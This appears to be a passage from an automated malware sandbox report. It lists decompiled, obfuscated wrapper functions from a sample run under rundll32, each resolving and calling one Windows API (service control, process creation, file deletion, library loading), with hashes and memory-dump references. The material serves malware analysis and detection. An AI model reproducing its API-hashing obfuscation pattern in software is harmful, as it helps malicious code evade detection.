				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001F87F2,0000CAAE,0000510C,AD82F196), ref: 0020989B

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1129fbc2d41107b07c5125bba92e75e737e23df9f0a9dadb9c0d9eff1fb701ab
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 92019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00207BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00207BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002007A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00207C67

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0bd237f299dba071f9f118eedf935ca560909e1e9c893418f39fac6ec27e5db5
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF45314F208198F50567250EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001FF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002007A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001FF6D8

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0ba70dfcec261f9c2b8ba06074caf9871ca36b38ce8cbd8547282b028e6c8062
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FF01E5B690120CBBEF059F94DC468DF7F75EB05324F148188F90462250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001FB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001F602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002007A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001fb6f3
0x001fb6f8
0x001fb702
0x001fb70b
0x001fb712
0x001fb719
0x001fb720
0x001fb727
0x001fb72e
0x001fb747
0x001fb759
0x001fb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001FB759

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: b1d20f5bfc209d41f81da95ba7a171abb8ca67a26d1bf3f6441a10f7ed33f6b7
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: CC018BB294030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0020AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0020aa3f
0x0020aa40
0x0020aa41
0x0020aa44
0x0020aa47
0x0020aa4b
0x0020aa4c
0x0020aa51
0x0020aa5b
0x0020aa64
0x0020aa68
0x0020aa6f
0x0020aa76
0x0020aa8d
0x0020aa90
0x0020aa9d
0x0020aaa8
0x0020aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0020AAA8

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 47197d10c455c84a89c7741739c354172d350b13dcd5ceef6f090ec2054df0fc
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: F0F069B190020CFFDF08DF94DD4A99EBFB4EB41304F108088F905A6260D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001f5fb5
0x001f5fb6
0x001f5fb7
0x001f5fbb
0x001f5fbc
0x001f5fc1
0x001f5fcb
0x001f5fd7
0x001f5fde
0x001f5fe5
0x001f5ffc
0x001f5fff
0x001f6006
0x001f600d
0x001f601a
0x001f6025
0x001f602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001F6025

Memory Dump Source

Source File: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000A.00000002.2105260466.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2105294865.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 69b7a602794ff9f7d4ed518adff1221bfcb0fd5835044999a835a919fe29db3f
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: ADF04FB0C1120CFFEB08DFA0E94689EBFB8EB40300F208198E509A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2824 Parent PID: 2732 rundll32.exeCOMMON

Executed Functions

Function 002E2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E002E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E002E602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x002e295f
0x002e2964
0x002e2967
0x002e296a
0x002e296d
0x002e296e
0x002e296f
0x002e2977
0x002e2985
0x002e298a
0x002e2992
0x002e299a
0x002e29a2
0x002e29a9
0x002e29b0
0x002e29b7
0x002e29bb
0x002e29cf
0x002e29dc
0x002e29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002E29DC

Strings

<^, xrefs: 002E2977

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 2a711c92ee0b7b86200d628ae98ffddf7b87fe96e458442cee601f0942e7078b
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: DB016D72A00108BFEB14DF95DC4A8DFBFB6EF44350F108098F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 002EC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002E602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x002ec6e1
0x002ec6e6
0x002ec6f0
0x002ec6fc
0x002ec703
0x002ec706
0x002ec70d
0x002ec711
0x002ec715
0x002ec71c
0x002ec723
0x002ec72a
0x002ec731
0x002ec738
0x002ec751
0x002ec762
0x002ec768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002EC762

Strings

/O, xrefs: 002EC6E6

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: ea1756d3fc8e4c569e3f7bda320c6462296b8b8e23eac2e4cb3cba5dbee470c5
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: DE1133B290122DBBCB25DF95DC498EFBFB8EF04754F108188F90962220D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 002E1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E002E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002E602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x002e1006
0x002e1009
0x002e100c
0x002e1011
0x002e1016
0x002e101d
0x002e1026
0x002e102d
0x002e1034
0x002e103b
0x002e1047
0x002e104f
0x002e1057
0x002e105e
0x002e1065
0x002e106c
0x002e1073
0x002e1077
0x002e108b
0x002e1096
0x002e109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 002E1096

Strings

[, xrefs: 002E103B

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 269d59e92fd691a93464df8253ea3f73fda977acd5fc380f60e142327171761b
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 6C015BB6D0130CBBDF04DF94C94A5EEBBB1AB54318F108188E51466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 002E4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E002E4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x002e485e
0x002e487a
0x002e487d
0x002e4884
0x002e488b
0x002e4892
0x002e489d
0x002e48a0
0x002e48ad
0x002e48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002E48B7

Strings

[, xrefs: 002E488B

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 67eb0bd97c748fe130fcb41340eed0547da5349c68bd20aaa330287ce9af4465
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 25F0F4B0A15209BBDB04CFA8CA9699EBFB9AB40301F208198E444A7290E2B15F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 002F4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E002F4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002E602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x002f4f80
0x002f4f81
0x002f4f82
0x002f4f86
0x002f4f87
0x002f4f8c
0x002f4fa5
0x002f4fa8
0x002f4faf
0x002f4fb6
0x002f4fc7
0x002f4fca
0x002f4fd7
0x002f4fe2
0x002f4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 002F4FE2

Strings

{#lm, xrefs: 002F4FC2

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 82e2c2fe886cb656f3c9c97435a91204e5efdd147ebf1d14fdbe78cfa962980a
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: C6F037B081120CFFDB04EFA4D98689EBFBAEB40340F208199E808AB261D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 002F976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E002F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x002f9772
0x002f9773
0x002f9778
0x002f977a
0x002f977b
0x002f977e
0x002f977f
0x002f9782
0x002f9785
0x002f9788
0x002f9789
0x002f978c
0x002f978f
0x002f9790
0x002f9791
0x002f9794
0x002f9797
0x002f979a
0x002f979d
0x002f97a0
0x002f97a3
0x002f97a6
0x002f97a7
0x002f97a8
0x002f97ad
0x002f97b7
0x002f97c3
0x002f97ca
0x002f97d1
0x002f97d8
0x002f97df
0x002f97e3
0x002f97fc
0x002f9816
0x002f981d

APIs

CreateProcessW.KERNEL32(002E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002E591A), ref: 002F9816

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 7ebcfbc562d13d42addf04a3efd11e150b00ed10c96a7ca0929041e775afd092
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2911B372911188BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 002EB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E002EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002E602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x002eb569
0x002eb56a
0x002eb56d
0x002eb572
0x002eb574
0x002eb577
0x002eb57a
0x002eb57d
0x002eb580
0x002eb583
0x002eb586
0x002eb587
0x002eb58a
0x002eb58d
0x002eb590
0x002eb593
0x002eb594
0x002eb595
0x002eb59a
0x002eb5a4
0x002eb5b8
0x002eb5c0
0x002eb5c4
0x002eb5cb
0x002eb5d2
0x002eb5d9
0x002eb5e6
0x002eb5fd
0x002eb604

APIs

CreateFileW.KERNELBASE(002F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002F0668,?,?,?,?), ref: 002EB5FD

Memory Dump Source

Source File: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Offset: 002E0000, based on PE: true

Associated: 0000000B.00000002.2108174881.00000000002E0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2108314798.00000000002FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 29db32e53107b43b84ea346503b4efd87a2433262b376789c2d60cbbf130bb1b
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0911C372801248BBDF16DF95DD06CEEBF7AFF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 002F981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E002F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x002f9821
0x002f9822
0x002f9825
0x002f9828
0x002f982a
0x002f982c
0x002f982f
0x002f9832
0x002f9835
0x002f9836
0x002f9837
0x002f983c
0x002f9855
0x002f9858
0x002f985f
0x002f9866
0x002f986d
0x002f9874
0x002f987b
0x002f988e
0x002f989b
0x002f98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002E87F2,0000CAAE,0000510C,AD82F196), ref: 002F989B

Memory Dump Source

